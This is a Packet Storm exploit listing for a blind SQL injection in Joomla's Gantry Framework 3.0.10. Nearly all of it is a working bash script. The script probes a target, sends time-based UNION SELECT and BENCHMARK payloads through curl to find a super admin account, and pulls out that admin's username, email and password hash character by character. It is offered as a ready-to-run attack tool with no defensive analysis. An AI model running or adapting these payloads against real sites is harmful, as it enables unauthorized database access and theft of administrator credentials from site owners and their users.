Joomla Gantry Framework 3.0.10 Blind SQL Injection

2010-09-08T00:00:00
ID PACKETSTORM:93570
Type packetstorm
Reporter jdc
Modified 2010-09-08T00:00:00

Description

                                        
                                            `#!/bin/bash  
# Exploit Title: Gantry Framework 3.0.10 (Joomla) Blind SQL Injection  
Exploit  
# Date: 4 September 2010  
# Author: jdc  
# Software Link: http://www.gantry-framework.org  
# Version: 3.0.10  
# Patched: 3.0.11  
if [ "$1" == "" ]  
then  
echo "$0 usage: $0 url [debug]"  
echo ""  
exit 1  
fi  
clear  
echo "##############################################################"  
echo "## Gantry Framework 3.0.10 Blind SQL Injection Exploit ##"  
echo "##############################################################"  
echo ""  
echo " Probing target $1 ..."  
echo ""  
GANTRY_PATH="$1/index.php"  
GANTRY_TIMEOUT="5"  
GANTRY_DELAY="10"  
GANTRY_AGENT='Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)'  
GANTRY_DATA="option=com_gantry&tmpl=gantry-ajax&model=module&moduleid="  
GANTRY_BENCHMARK="10000000"  
GANTRY_ADMIN_ID=""  
GANTRY_OUTPUT=""  
GANTRY_EXPLOIT="-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16"  
GANTRY_TEST=`curl -s -A "$GANTRY_AGENT" -d "$GANTRY_DATA$GANTRY_EXPLOIT"  
"$GANTRY_PATH"`  
GANTRY_REQUESTS="1"  
if [ "Direct access not allowed." != "$GANTRY_TEST" ]  
then  
echo $GANTRY_TEST  
echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"  
echo "!! Site not vulnerable. Bailing! !!"  
echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"  
echo ""  
echo "$GANTRY_REQUESTS requests"  
echo ""  
exit 1  
fi  
echo -n " Trying to get a super admin id... "  
for N in `seq 62 9999`  
do  
  
GANTRY_EXPLOIT="-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,IF((SELECT%20id%20FROM%20%23__users%20WHERE%20gid=25%20AND%20id=$N),BENCHMARK($GANTRY_BENCHMARK,MD5(1)),16)"  
GANTRY_TIME="`curl -s -A "$GANTRY_AGENT" -o /dev/null -w  
'%{time_total}' -H 'X-Requested-With: XMLHttpRequest' -d  
"$GANTRY_DATA$GANTRY_EXPLOIT" $GANTRY_PATH`"  
GANTRY_REQUESTS=`echo "$GANTRY_REQUESTS + 1" | bc`  
if [ "" != "$2" ]  
then  
printf "$N"  
echo " $GANTRY_TIME"  
fi  
if [ `echo "$GANTRY_TIME > $GANTRY_TIMEOUT" | bc` == 1 ]  
then  
GANTRY_ADMIN_ID="$N"  
break  
fi  
sleep $GANTRY_DELAY  
done  
if [ "" == $GANTRY_ADMIN_ID ]  
then  
echo "FAILED!"  
echo ""  
echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"  
echo "!! Injection FAILED! !!"  
echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"  
echo ""  
echo "$GANTRY_REQUESTS requests"  
echo ""  
exit 1  
fi  
echo $GANTRY_ADMIN_ID  
echo " Fetching admin info (this WILL take a while)... "  
echo ""  
echo -n " > "  
for I in `seq 1 250`  
do  
GANTRY_LENGTH=`echo "$GANTRY_OUTPUT" | wc -c`  
GANTRY_CONTINUE=0  
#a,d,m,i,n,b-c,e-h,j-l,o-z,A-Z,0-9,special chars  
for J in `seq 97 97;seq 100 100;seq 109 109;seq 105 105;seq 110  
110;seq 98 99;seq 101 104;seq 106 108;seq 111 122;seq 65 90;seq 48  
57;seq 32 47;seq 58 64;seq 91 96;seq 123 126`  
do  
if [ 1 == $GANTRY_CONTINUE ]  
then  
continue  
fi  
sleep $GANTRY_DELAY  
  
GANTRY_EXPLOIT="-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,IF((SELECT%20id%20FROM%20%23__users%20WHERE%20gid=25%20AND%20id=$GANTRY_ADMIN_ID%20AND%20ASCII(SUBSTRING(CONCAT(username,0x3a,email,0x3a,password),$I,1))=$J),BENCHMARK(10000000,MD5(1)),16)"  
GANTRY_TIME="`curl -s -A "$GANTRY_AGENT" -o /dev/null -w  
'%{time_total}' -H 'X-Requested-With: XMLHttpRequest' -d  
"$GANTRY_DATA$GANTRY_EXPLOIT" $GANTRY_PATH`"  
GANTRY_REQUESTS=`echo "$GANTRY_REQUESTS + 1" | bc`  
if [ "" != "$2" ]  
then  
printf "\x$(printf %x $J)"  
echo " $GANTRY_TIME"  
fi  
if [ `echo "$GANTRY_TIME > $GANTRY_TIMEOUT" | bc` == 1 ]  
then  
LETTER=`printf "\x$(printf %x $J)"`  
GANTRY_OUTPUT="$GANTRY_OUTPUT$LETTER"  
GANTRY_CONTINUE=1  
if [ "" == "$2" ]  
then  
echo -n "$LETTER"  
fi  
fi  
done  
GANTRY_LENGTH2=`echo "$GANTRY_OUTPUT" | wc -c`  
if [ "$GANTRY_LENGTH" == "$GANTRY_LENGTH2" ]  
then  
break  
fi  
done  
echo ""  
if [ "$GANTRY_OUTPUT" == "" ]  
then  
echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"  
echo "!! Injection FAILED! !!"  
echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"  
echo ""  
echo "$GANTRY_REQUESTS requests"  
echo ""  
exit 1  
fi  
echo ""  
echo "$GANTRY_OUTPUT"  
echo ""  
echo "$GANTRY_REQUESTS requests"  
echo ""  
exit 0  
  
`